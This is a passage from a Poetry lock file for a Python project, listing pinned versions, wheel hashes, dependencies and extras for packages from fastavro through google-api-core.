{file = "fastavro-1.8.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d3510e96c0a47e4e914bd1a29c954eb662bfa24849ad92e597cb97cc79f21af7"},
{file = "fastavro-1.8.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ccc0e74f2c2ab357f39bb73d67fcdb6dc10e23fdbbd399326139f72ec0fb99a3"},
{file = "fastavro-1.8.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:add51c70d0ab1175601c75cd687bbe9d16ae312cd8899b907aafe0d79ee2bc1d"},
{file = "fastavro-1.8.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:d9e2662f57e6453e9a2c9fb4f54b2a9e62e3e46f5a412ac00558112336d23883"},
{file = "fastavro-1.8.2-cp311-cp311-win_amd64.whl", hash = "sha256:fea75cf53a93c56dd56e68abce8d314ef877b27451c870cd7ede7582d34c08a7"},
{file = "fastavro-1.8.2-cp38-cp38-macosx_11_0_x86_64.whl", hash = "sha256:f489020bb8664c2737c03457ad5dbd490579ddab6f0a7b5c17fecfe982715a89"},
{file = "fastavro-1.8.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a547625c138efd5e61300119241041906ee8cb426fc7aa789900f87af7ed330d"},
{file = "fastavro-1.8.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:53beb458f30c9ad4aa7bff4a42243ff990ffb713b6ce0cd9b360cbc3d648fe52"},
{file = "fastavro-1.8.2-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:7b1b2cbd2dd851452306beed0ab9bdaeeab1cc8ad46f84b47cd81eeaff6dd6b8"},
{file = "fastavro-1.8.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:d29e9baee0b2f37ecd09bde3b487cf900431fd548c85be3e4fe1b9a0b2a917f1"},
{file = "fastavro-1.8.2-cp38-cp38-win_amd64.whl", hash = "sha256:66e132c710663230292bc63e2cb79cf95b16ccb94a5fc99bb63694b24e312fc5"},
{file = "fastavro-1.8.2-cp39-cp39-macosx_11_0_x86_64.whl", hash = "sha256:38aca63ce604039bcdf2edd14912d00287bdbf8b76f9aa42b28e6ca0bf950092"},
{file = "fastavro-1.8.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9787835f6449ee94713e7993a700432fce3763024791ffa8a58dc91ef9d1f950"},
{file = "fastavro-1.8.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:536cb448bc83811056be02749fd9df37a69621678f02597d272970a769e9b40c"},
{file = "fastavro-1.8.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:e9d5027cf7d9968f8f819958b41bfedb933323ea6d6a0485eefacaa1afd91f54"},
{file = "fastavro-1.8.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:792adfc0c80c7f1109e0ab4b0decef20691fdf0a45091d397a0563872eb56d42"},
{file = "fastavro-1.8.2-cp39-cp39-win_amd64.whl", hash = "sha256:650b22766259f7dd7519dfa4e4658f0e233c319efa130b9cf0c36a500e09cc57"},
{file = "fastavro-1.8.2.tar.gz", hash = "sha256:ab9d9226d4b66b6b3d0661a57cd45259b0868fed1c0cd4fac95249b9e0973320"},
]
[package.extras]
codecs = ["lz4", "python-snappy", "zstandard"]
lz4 = ["lz4"]
snappy = ["python-snappy"]
zstandard = ["zstandard"]
[[package]]
name = "fastjsonschema"
version = "2.18.1"
description = "Fastest Python implementation of JSON schema"
optional = false
python-versions = "*"
files = [
{file = "fastjsonschema-2.18.1-py3-none-any.whl", hash = "sha256:aec6a19e9f66e9810ab371cc913ad5f4e9e479b63a7072a2cd060a9369e329a8"},
{file = "fastjsonschema-2.18.1.tar.gz", hash = "sha256:06dc8680d937628e993fa0cd278f196d20449a1adc087640710846b324d422ea"},
]
[package.extras]
devel = ["colorama", "json-spec", "jsonschema", "pylint", "pytest", "pytest-benchmark", "pytest-cache", "validictory"]
[[package]]
name = "feedfinder2"
version = "0.0.4"
description = "Find the feed URLs for a website."
optional = true
python-versions = "*"
files = [
{file = "feedfinder2-0.0.4.tar.gz", hash = "sha256:3701ee01a6c85f8b865a049c30ba0b4608858c803fe8e30d1d289fdbe89d0efe"},
]
[package.dependencies]
beautifulsoup4 = "*"
requests = "*"
six = "*"
[[package]]
name = "feedparser"
version = "6.0.10"
description = "Universal feed parser, handles RSS 0.9x, RSS 1.0, RSS 2.0, CDF, Atom 0.3, and Atom 1.0 feeds"
optional = true
python-versions = ">=3.6"
files = [
{file = "feedparser-6.0.10-py3-none-any.whl", hash = "sha256:79c257d526d13b944e965f6095700587f27388e50ea16fd245babe4dfae7024f"},
{file = "feedparser-6.0.10.tar.gz", hash = "sha256:27da485f4637ce7163cdeab13a80312b93b7d0c1b775bef4a47629a3110bca51"},
]
[package.dependencies]
sgmllib3k = "*"
[[package]]
name = "filelock"
version = "3.13.0"
description = "A platform independent file lock."
optional = true
python-versions = ">=3.8"
files = [
{file = "filelock-3.13.0-py3-none-any.whl", hash = "sha256:a552f4fde758f4eab33191e9548f671970f8b06d436d31388c9aa1e5861a710f"},
{file = "filelock-3.13.0.tar.gz", hash = "sha256:63c6052c82a1a24c873a549fbd39a26982e8f35a3016da231ead11a5be9dad44"},
]
[package.extras]
docs = ["furo (>=2023.9.10)", "sphinx (>=7.2.6)", "sphinx-autodoc-typehints (>=1.24)"]
testing = ["covdefaults (>=2.3)", "coverage (>=7.3.2)", "diff-cover (>=8)", "pytest (>=7.4.3)", "pytest-cov (>=4.1)", "pytest-mock (>=3.12)", "pytest-timeout (>=2.2)"]
typing = ["typing-extensions (>=4.8)"]
[[package]]
name = "fiona"
version = "1.9.5"
description = "Fiona reads and writes spatial data files"
optional = true
python-versions = ">=3.7"
files = [
{file = "fiona-1.9.5-cp310-cp310-macosx_10_15_x86_64.whl", hash = "sha256:5f40a40529ecfca5294260316cf987a0420c77a2f0cf0849f529d1afbccd093e"},
{file = "fiona-1.9.5-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:374efe749143ecb5cfdd79b585d83917d2bf8ecfbfc6953c819586b336ce9c63"},
{file = "fiona-1.9.5-cp310-cp310-manylinux2014_x86_64.whl", hash = "sha256:35dae4b0308eb44617cdc4461ceb91f891d944fdebbcba5479efe524ec5db8de"},
{file = "fiona-1.9.5-cp310-cp310-win_amd64.whl", hash = "sha256:5b4c6a3df53bee8f85bb46685562b21b43346be1fe96419f18f70fa1ab8c561c"},
{file = "fiona-1.9.5-cp311-cp311-macosx_10_15_x86_64.whl", hash = "sha256:6ad04c1877b9fd742871b11965606c6a52f40706f56a48d66a87cc3073943828"},
{file = "fiona-1.9.5-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:9fb9a24a8046c724787719e20557141b33049466145fc3e665764ac7caf5748c"},
{file = "fiona-1.9.5-cp311-cp311-manylinux2014_x86_64.whl", hash = "sha256:d722d7f01a66f4ab6cd08d156df3fdb92f0669cf5f8708ddcb209352f416f241"},
{file = "fiona-1.9.5-cp311-cp311-win_amd64.whl", hash = "sha256:7ede8ddc798f3d447536080c6db9a5fb73733ad8bdb190cb65eed4e289dd4c50"},
{file = "fiona-1.9.5-cp312-cp312-macosx_10_15_x86_64.whl", hash = "sha256:8b098054a27c12afac4f819f98cb4d4bf2db9853f70b0c588d7d97d26e128c39"},
{file = "fiona-1.9.5-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:6d9f29e9bcbb33232ff7fa98b4a3c2234db910c1dc6c4147fc36c0b8b930f2e0"},
{file = "fiona-1.9.5-cp312-cp312-manylinux2014_x86_64.whl", hash = "sha256:f1af08da4ecea5036cb81c9131946be4404245d1b434b5b24fd3871a1d4030d9"},
{file = "fiona-1.9.5-cp312-cp312-win_amd64.whl", hash = "sha256:c521e1135c78dec0d7774303e5a1b4c62e0efb0e602bb8f167550ef95e0a2691"},
{file = "fiona-1.9.5-cp37-cp37m-macosx_10_15_x86_64.whl", hash = "sha256:fce4b1dd98810cabccdaa1828430c7402d283295c2ae31bea4f34188ea9e88d7"},
{file = "fiona-1.9.5-cp37-cp37m-manylinux2014_x86_64.whl", hash = "sha256:3ea04ec2d8c57b5f81a31200fb352cb3242aa106fc3e328963f30ffbdf0ff7c8"},
{file = "fiona-1.9.5-cp37-cp37m-win_amd64.whl", hash = "sha256:4877cc745d9e82b12b3eafce3719db75759c27bd8a695521202135b36b58c2e7"},
{file = "fiona-1.9.5-cp38-cp38-macosx_10_15_x86_64.whl", hash = "sha256:ac2c250f509ec19fad7959d75b531984776517ef3c1222d1cc5b4f962825880b"},
{file = "fiona-1.9.5-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4df21906235928faad856c288cfea0298e9647f09c9a69a230535cbc8eadfa21"},
{file = "fiona-1.9.5-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:81d502369493687746cb8d3cd77e5ada4447fb71d513721c9a1826e4fb32b23a"},
{file = "fiona-1.9.5-cp38-cp38-win_amd64.whl", hash = "sha256:ce3b29230ef70947ead4e701f3f82be81082b7f37fd4899009b1445cc8fc276a"},
{file = "fiona-1.9.5-cp39-cp39-macosx_10_15_x86_64.whl", hash = "sha256:8b53ce8de773fcd5e2e102e833c8c58479edd8796a522f3d83ef9e08b62bfeea"},
{file = "fiona-1.9.5-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:bd2355e859a1cd24a3e485c6dc5003129f27a2051629def70036535ffa7e16a4"},
{file = "fiona-1.9.5-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:9a2da52f865db1aff0eaf41cdd4c87a7c079b3996514e8e7a1ca38457309e825"},
{file = "fiona-1.9.5-cp39-cp39-win_amd64.whl", hash = "sha256:cfef6db5b779d463298b1113b50daa6c5b55f26f834dc9e37752116fa17277c1"},
{file = "fiona-1.9.5.tar.gz", hash = "sha256:99e2604332caa7692855c2ae6ed91e1fffdf9b59449aa8032dd18e070e59a2f7"},
]
[package.dependencies]
attrs = ">=19.2.0"
certifi = "*"
click = ">=8.0,<9.0"
click-plugins = ">=1.0"
cligj = ">=0.5"
importlib-metadata = {version = "*", markers = "python_version < \"3.10\""}
setuptools = "*"
six = "*"
[package.extras]
all = ["Fiona[calc,s3,test]"]
calc = ["shapely"]
s3 = ["boto3 (>=1.3.1)"]
test = ["Fiona[s3]", "pytest (>=7)", "pytest-cov", "pytz"]
[[package]]
name = "flatbuffers"
version = "23.5.26"
description = "The FlatBuffers serialization format for Python"
optional = true
python-versions = "*"
files = [
{file = "flatbuffers-23.5.26-py2.py3-none-any.whl", hash = "sha256:c0ff356da363087b915fde4b8b45bdda73432fc17cddb3c8157472eab1422ad1"},
{file = "flatbuffers-23.5.26.tar.gz", hash = "sha256:9ea1144cac05ce5d86e2859f431c6cd5e66cd9c78c558317c7955fb8d4c78d89"},
]
[[package]]
name = "fqdn"
version = "1.5.1"
description = "Validates fully-qualified domain names against RFC 1123, so that they are acceptable to modern bowsers"
optional = false
python-versions = ">=2.7, !=3.0, !=3.1, !=3.2, !=3.3, !=3.4, <4"
files = [
{file = "fqdn-1.5.1-py3-none-any.whl", hash = "sha256:3a179af3761e4df6eb2e026ff9e1a3033d3587bf980a0b1b2e1e5d08d7358014"},
{file = "fqdn-1.5.1.tar.gz", hash = "sha256:105ed3677e767fb5ca086a0c1f4bb66ebc3c100be518f0e0d755d9eae164d89f"},
]
[[package]]
name = "freezegun"
version = "1.2.2"
description = "Let your Python tests travel through time"
optional = false
python-versions = ">=3.6"
files = [
{file = "freezegun-1.2.2-py3-none-any.whl", hash = "sha256:ea1b963b993cb9ea195adbd893a48d573fda951b0da64f60883d7e988b606c9f"},
{file = "freezegun-1.2.2.tar.gz", hash = "sha256:cd22d1ba06941384410cd967d8a99d5ae2442f57dfafeff2fda5de8dc5c05446"},
]
[package.dependencies]
python-dateutil = ">=2.7"
[[package]]
name = "frozenlist"
version = "1.4.0"
description = "A list-like structure which implements collections.abc.MutableSequence"
optional = false
python-versions = ">=3.8"
files = [
{file = "frozenlist-1.4.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:764226ceef3125e53ea2cb275000e309c0aa5464d43bd72abd661e27fffc26ab"},
{file = "frozenlist-1.4.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d6484756b12f40003c6128bfcc3fa9f0d49a687e171186c2d85ec82e3758c559"},
{file = "frozenlist-1.4.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9ac08e601308e41eb533f232dbf6b7e4cea762f9f84f6357136eed926c15d12c"},
{file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d081f13b095d74b67d550de04df1c756831f3b83dc9881c38985834387487f1b"},
{file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:71932b597f9895f011f47f17d6428252fc728ba2ae6024e13c3398a087c2cdea"},
{file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:981b9ab5a0a3178ff413bca62526bb784249421c24ad7381e39d67981be2c326"},
{file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e41f3de4df3e80de75845d3e743b3f1c4c8613c3997a912dbf0229fc61a8b963"},
{file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6918d49b1f90821e93069682c06ffde41829c346c66b721e65a5c62b4bab0300"},
{file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:0e5c8764c7829343d919cc2dfc587a8db01c4f70a4ebbc49abde5d4b158b007b"},
{file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:8d0edd6b1c7fb94922bf569c9b092ee187a83f03fb1a63076e7774b60f9481a8"},
{file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:e29cda763f752553fa14c68fb2195150bfab22b352572cb36c43c47bedba70eb"},
{file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:0c7c1b47859ee2cac3846fde1c1dc0f15da6cec5a0e5c72d101e0f83dcb67ff9"},
{file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:901289d524fdd571be1c7be054f48b1f88ce8dddcbdf1ec698b27d4b8b9e5d62"},
{file = "frozenlist-1.4.0-cp310-cp310-win32.whl", hash = "sha256:1a0848b52815006ea6596c395f87449f693dc419061cc21e970f139d466dc0a0"},
{file = "frozenlist-1.4.0-cp310-cp310-win_amd64.whl", hash = "sha256:b206646d176a007466358aa21d85cd8600a415c67c9bd15403336c331a10d956"},
{file = "frozenlist-1.4.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:de343e75f40e972bae1ef6090267f8260c1446a1695e77096db6cfa25e759a95"},
{file = "frozenlist-1.4.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ad2a9eb6d9839ae241701d0918f54c51365a51407fd80f6b8289e2dfca977cc3"},
{file = "frozenlist-1.4.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:bd7bd3b3830247580de99c99ea2a01416dfc3c34471ca1298bccabf86d0ff4dc"},
{file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bdf1847068c362f16b353163391210269e4f0569a3c166bc6a9f74ccbfc7e839"},
{file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:38461d02d66de17455072c9ba981d35f1d2a73024bee7790ac2f9e361ef1cd0c"},
{file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d5a32087d720c608f42caed0ef36d2b3ea61a9d09ee59a5142d6070da9041b8f"},
{file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:dd65632acaf0d47608190a71bfe46b209719bf2beb59507db08ccdbe712f969b"},
{file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:261b9f5d17cac914531331ff1b1d452125bf5daa05faf73b71d935485b0c510b"},
{file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:b89ac9768b82205936771f8d2eb3ce88503b1556324c9f903e7156669f521472"},
{file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:008eb8b31b3ea6896da16c38c1b136cb9fec9e249e77f6211d479db79a4eaf01"},
{file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:e74b0506fa5aa5598ac6a975a12aa8928cbb58e1f5ac8360792ef15de1aa848f"},
{file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:490132667476f6781b4c9458298b0c1cddf237488abd228b0b3650e5ecba7467"},
{file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:76d4711f6f6d08551a7e9ef28c722f4a50dd0fc204c56b4bcd95c6cc05ce6fbb"},
{file = "frozenlist-1.4.0-cp311-cp311-win32.whl", hash = "sha256:a02eb8ab2b8f200179b5f62b59757685ae9987996ae549ccf30f983f40602431"},
{file = "frozenlist-1.4.0-cp311-cp311-win_amd64.whl", hash = "sha256:515e1abc578dd3b275d6a5114030b1330ba044ffba03f94091842852f806f1c1"},
{file = "frozenlist-1.4.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:f0ed05f5079c708fe74bf9027e95125334b6978bf07fd5ab923e9e55e5fbb9d3"},
{file = "frozenlist-1.4.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ca265542ca427bf97aed183c1676e2a9c66942e822b14dc6e5f42e038f92a503"},
{file = "frozenlist-1.4.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:491e014f5c43656da08958808588cc6c016847b4360e327a62cb308c791bd2d9"},
{file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:17ae5cd0f333f94f2e03aaf140bb762c64783935cc764ff9c82dff626089bebf"},
{file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1e78fb68cf9c1a6aa4a9a12e960a5c9dfbdb89b3695197aa7064705662515de2"},
{file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d5655a942f5f5d2c9ed93d72148226d75369b4f6952680211972a33e59b1dfdc"},
{file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c11b0746f5d946fecf750428a95f3e9ebe792c1ee3b1e96eeba145dc631a9672"},
{file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e66d2a64d44d50d2543405fb183a21f76b3b5fd16f130f5c99187c3fb4e64919"},
{file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:88f7bc0fcca81f985f78dd0fa68d2c75abf8272b1f5c323ea4a01a4d7a614efc"},
{file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:5833593c25ac59ede40ed4de6d67eb42928cca97f26feea219f21d0ed0959b79"},
{file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:fec520865f42e5c7f050c2a79038897b1c7d1595e907a9e08e3353293ffc948e"},
{file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:b826d97e4276750beca7c8f0f1a4938892697a6bcd8ec8217b3312dad6982781"},
{file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:ceb6ec0a10c65540421e20ebd29083c50e6d1143278746a4ef6bcf6153171eb8"},
{file = "frozenlist-1.4.0-cp38-cp38-win32.whl", hash = "sha256:2b8bcf994563466db019fab287ff390fffbfdb4f905fc77bc1c1d604b1c689cc"},
{file = "frozenlist-1.4.0-cp38-cp38-win_amd64.whl", hash = "sha256:a6c8097e01886188e5be3e6b14e94ab365f384736aa1fca6a0b9e35bd4a30bc7"},
{file = "frozenlist-1.4.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:6c38721585f285203e4b4132a352eb3daa19121a035f3182e08e437cface44bf"},
{file = "frozenlist-1.4.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:a0c6da9aee33ff0b1a451e867da0c1f47408112b3391dd43133838339e410963"},
{file = "frozenlist-1.4.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:93ea75c050c5bb3d98016b4ba2497851eadf0ac154d88a67d7a6816206f6fa7f"},
{file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f61e2dc5ad442c52b4887f1fdc112f97caeff4d9e6ebe78879364ac59f1663e1"},
{file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:aa384489fefeb62321b238e64c07ef48398fe80f9e1e6afeff22e140e0850eef"},
{file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:10ff5faaa22786315ef57097a279b833ecab1a0bfb07d604c9cbb1c4cdc2ed87"},
{file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:007df07a6e3eb3e33e9a1fe6a9db7af152bbd8a185f9aaa6ece10a3529e3e1c6"},
{file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7f4f399d28478d1f604c2ff9119907af9726aed73680e5ed1ca634d377abb087"},
{file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:c5374b80521d3d3f2ec5572e05adc94601985cc526fb276d0c8574a6d749f1b3"},
{file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:ce31ae3e19f3c902de379cf1323d90c649425b86de7bbdf82871b8a2a0615f3d"},
{file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:7211ef110a9194b6042449431e08c4d80c0481e5891e58d429df5899690511c2"},
{file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:556de4430ce324c836789fa4560ca62d1591d2538b8ceb0b4f68fb7b2384a27a"},
{file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:7645a8e814a3ee34a89c4a372011dcd817964ce8cb273c8ed6119d706e9613e3"},
{file = "frozenlist-1.4.0-cp39-cp39-win32.whl", hash = "sha256:19488c57c12d4e8095a922f328df3f179c820c212940a498623ed39160bc3c2f"},
{file = "frozenlist-1.4.0-cp39-cp39-win_amd64.whl", hash = "sha256:6221d84d463fb110bdd7619b69cb43878a11d51cbb9394ae3105d082d5199167"},
{file = "frozenlist-1.4.0.tar.gz", hash = "sha256:09163bdf0b2907454042edb19f887c6d33806adc71fbd54afc14908bfdc22251"},
]
[[package]]
name = "fsspec"
version = "2023.10.0"
description = "File-system specification"
optional = true
python-versions = ">=3.8"
files = [
{file = "fsspec-2023.10.0-py3-none-any.whl", hash = "sha256:346a8f024efeb749d2a5fca7ba8854474b1ff9af7c3faaf636a4548781136529"},
{file = "fsspec-2023.10.0.tar.gz", hash = "sha256:330c66757591df346ad3091a53bd907e15348c2ba17d63fd54f5c39c4457d2a5"},
]
[package.extras]
abfs = ["adlfs"]
adl = ["adlfs"]
arrow = ["pyarrow (>=1)"]
dask = ["dask", "distributed"]
devel = ["pytest", "pytest-cov"]
dropbox = ["dropbox", "dropboxdrivefs", "requests"]
full = ["adlfs", "aiohttp (!=4.0.0a0,!=4.0.0a1)", "dask", "distributed", "dropbox", "dropboxdrivefs", "fusepy", "gcsfs", "libarchive-c", "ocifs", "panel", "paramiko", "pyarrow (>=1)", "pygit2", "requests", "s3fs", "smbprotocol", "tqdm"]
fuse = ["fusepy"]
gcs = ["gcsfs"]
git = ["pygit2"]
github = ["requests"]
gs = ["gcsfs"]
gui = ["panel"]
hdfs = ["pyarrow (>=1)"]
http = ["aiohttp (!=4.0.0a0,!=4.0.0a1)", "requests"]
libarchive = ["libarchive-c"]
oci = ["ocifs"]
s3 = ["s3fs"]
sftp = ["paramiko"]
smb = ["smbprotocol"]
ssh = ["paramiko"]
tqdm = ["tqdm"]
[[package]]
name = "future"
version = "0.18.3"
description = "Clean single-source support for Python 3 and 2"
optional = true
python-versions = ">=2.6, !=3.0.*, !=3.1.*, !=3.2.*"
files = [
{file = "future-0.18.3.tar.gz", hash = "sha256:34a17436ed1e96697a86f9de3d15a3b0be01d8bc8de9c1dffd59fb8234ed5307"},
]
[[package]]
name = "gast"
version = "0.4.0"
description = "Python AST that abstracts the underlying Python version"
optional = true
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
files = [
{file = "gast-0.4.0-py3-none-any.whl", hash = "sha256:b7adcdd5adbebf1adf17378da5ba3f543684dbec47b1cda1f3997e573cd542c4"},
{file = "gast-0.4.0.tar.gz", hash = "sha256:40feb7b8b8434785585ab224d1568b857edb18297e5a3047f1ba012bc83b42c1"},
]
[[package]]
name = "geojson"
version = "2.5.0"
description = "Python bindings and utilities for GeoJSON"
optional = true
python-versions = "*"
files = [
{file = "geojson-2.5.0-py2.py3-none-any.whl", hash = "sha256:ccbd13368dd728f4e4f13ffe6aaf725b6e802c692ba0dde628be475040c534ba"},
{file = "geojson-2.5.0.tar.gz", hash = "sha256:6e4bb7ace4226a45d9c8c8b1348b3fc43540658359f93c3f7e03efa9f15f658a"},
]
[[package]]
name = "geomet"
version = "0.2.1.post1"
description = "GeoJSON <-> WKT/WKB conversion utilities"
optional = false
python-versions = ">2.6, !=3.3.*, <4"
files = [
{file = "geomet-0.2.1.post1-py3-none-any.whl", hash = "sha256:a41a1e336b381416d6cbed7f1745c848e91defaa4d4c1bdc1312732e46ffad2b"},
{file = "geomet-0.2.1.post1.tar.gz", hash = "sha256:91d754f7c298cbfcabd3befdb69c641c27fe75e808b27aa55028605761d17e95"},
]
[package.dependencies]
click = "*"
six = "*"
[[package]]
name = "geopandas"
version = "0.13.2"
description = "Geographic pandas extensions"
optional = true
python-versions = ">=3.8"
files = [
{file = "geopandas-0.13.2-py3-none-any.whl", hash = "sha256:101cfd0de54bcf9e287a55b5ea17ebe0db53a5e25a28bacf100143d0507cabd9"},
{file = "geopandas-0.13.2.tar.gz", hash = "sha256:e5b56d9c20800c77bcc0c914db3f27447a37b23b2cd892be543f5001a694a968"},
]
[package.dependencies]
fiona = ">=1.8.19"
packaging = "*"
pandas = ">=1.1.0"
pyproj = ">=3.0.1"
shapely = ">=1.7.1"
[[package]]
name = "gitdb"
version = "4.0.11"
description = "Git Object Database"
optional = true
python-versions = ">=3.7"
files = [
{file = "gitdb-4.0.11-py3-none-any.whl", hash = "sha256:81a3407ddd2ee8df444cbacea00e2d038e40150acfa3001696fe0dcf1d3adfa4"},
{file = "gitdb-4.0.11.tar.gz", hash = "sha256:bf5421126136d6d0af55bc1e7c1af1c397a34f5b7bd79e776cd3e89785c2b04b"},
]
[package.dependencies]
smmap = ">=3.0.1,<6"
[[package]]
name = "gitpython"
version = "3.1.40"
description = "GitPython is a Python library used to interact with Git repositories"
optional = true
python-versions = ">=3.7"
files = [
{file = "GitPython-3.1.40-py3-none-any.whl", hash = "sha256:cf14627d5a8049ffbf49915732e5eddbe8134c3bdb9d476e6182b676fc573f8a"},
{file = "GitPython-3.1.40.tar.gz", hash = "sha256:22b126e9ffb671fdd0c129796343a02bf67bf2994b35449ffc9321aa755e18a4"},
]
[package.dependencies]
gitdb = ">=4.0.1,<5"
[package.extras]
test = ["black", "coverage[toml]", "ddt (>=1.1.1,!=1.4.3)", "mock", "mypy", "pre-commit", "pytest", "pytest-cov", "pytest-instafail", "pytest-subtests", "pytest-sugar"]
[[package]]
name = "google-api-core"
version = "1.34.0"
description = "Google API client core library"
optional = true
python-versions = ">=3.7"
files = [
{file = "google-api-core-1.34.0.tar.gz", hash = "sha256:6fb380f49d19ee1d09a9722d0379042b7edb06c0112e4796c7a395078a043e71"},
{file = "google_api_core-1.34.0-py3-none-any.whl", hash = "sha256:7421474c39d396a74dfa317dddbc69188f2336835f526087c7648f91105e32ff"},
]
[package.dependencies]
google-auth = ">=1.25.0,<3.0dev"
googleapis-common-protos = ">=1.56.2,<2.0dev"
grpcio = {version = ">=1.33.2,<2.0dev", optional = true, markers = "extra == \"grpc\""}
grpcio-status = {version = ">=1.33.2,<2.0dev", optional = true, markers = "extra == \"grpc\""}
protobuf = ">=3.19.5,<3.20.0 || >3.20.0,<3.20.1 || >3.20.1,<4.0.0dev"
